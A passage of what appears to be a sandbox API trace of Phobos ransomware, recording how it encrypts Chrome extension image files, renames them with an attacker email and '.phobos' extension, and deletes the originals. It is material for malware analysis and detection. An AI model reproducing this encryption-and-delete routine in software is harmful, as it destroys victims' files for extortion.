data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif")) returned 0x2020 [0155.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0155.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0155.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0155.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0155.310] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0155.310] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x112dc, lpOverlapped=0x0) returned 1 [0156.097] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x112e0, dwBufLen=0x112e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x112e0) returned 1 [0156.097] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112e0, lpOverlapped=0x0) returned 1 [0156.099] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.099] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.099] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0156.099] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.099] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0156.099] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.099] CloseHandle (hObject=0x134) returned 1 [0156.099] CloseHandle (hObject=0x130) returned 1 [0156.100] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif")) returned 1 [0156.101] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.101] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4361) returned 1 [0156.101] CloseHandle (hObject=0x130) returned 1 [0156.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png")) returned 0x2020 [0156.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.102] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.102] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.102] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.102] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1109, lpOverlapped=0x0) returned 1 [0156.103] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1110, dwBufLen=0x1110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1110) returned 1 [0156.103] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1110, lpOverlapped=0x0) returned 1 [0156.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.106] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.106] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0156.106] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.106] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0156.106] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.106] CloseHandle (hObject=0x130) returned 1 [0156.106] CloseHandle (hObject=0x134) returned 1 [0156.106] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png")) returned 1 [0156.107] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.108] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=556) returned 1 [0156.108] CloseHandle (hObject=0x134) returned 1 [0156.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png")) returned 0x2020 [0156.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.110] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.110] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.110] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.110] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x22c, lpOverlapped=0x0) returned 1 [0156.111] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230, dwBufLen=0x230 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230) returned 1 [0156.111] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x230, lpOverlapped=0x0) returned 1 [0156.112] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.112] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.112] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0156.112] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.112] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0156.112] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.112] CloseHandle (hObject=0x134) returned 1 [0156.112] CloseHandle (hObject=0x130) returned 1 [0156.112] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png")) returned 1 [0156.113] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.114] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=160) returned 1 [0156.114] CloseHandle (hObject=0x130) returned 1 [0156.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png")) returned 0x2020 [0156.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0156.114] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.114] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0156.115] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.115] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa0, lpOverlapped=0x0) returned 1 [0156.116] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0156.116] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0156.116] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0156.116] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0156.116] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0156.116] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.116] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0156.117] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0156.117] CloseHandle (hObject=0x130) returned 1 [0156.117] CloseHandle (hObject=0x134) returned 1 [0156.117] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png")) returned 1 [0156.118] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0156.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.121] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=252) returned 1 [0156.121] CloseHandle (hObject=0x134) returned 1 [0156.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png")) returned 0x2020 [0156.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0156.121] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.121] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0156.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 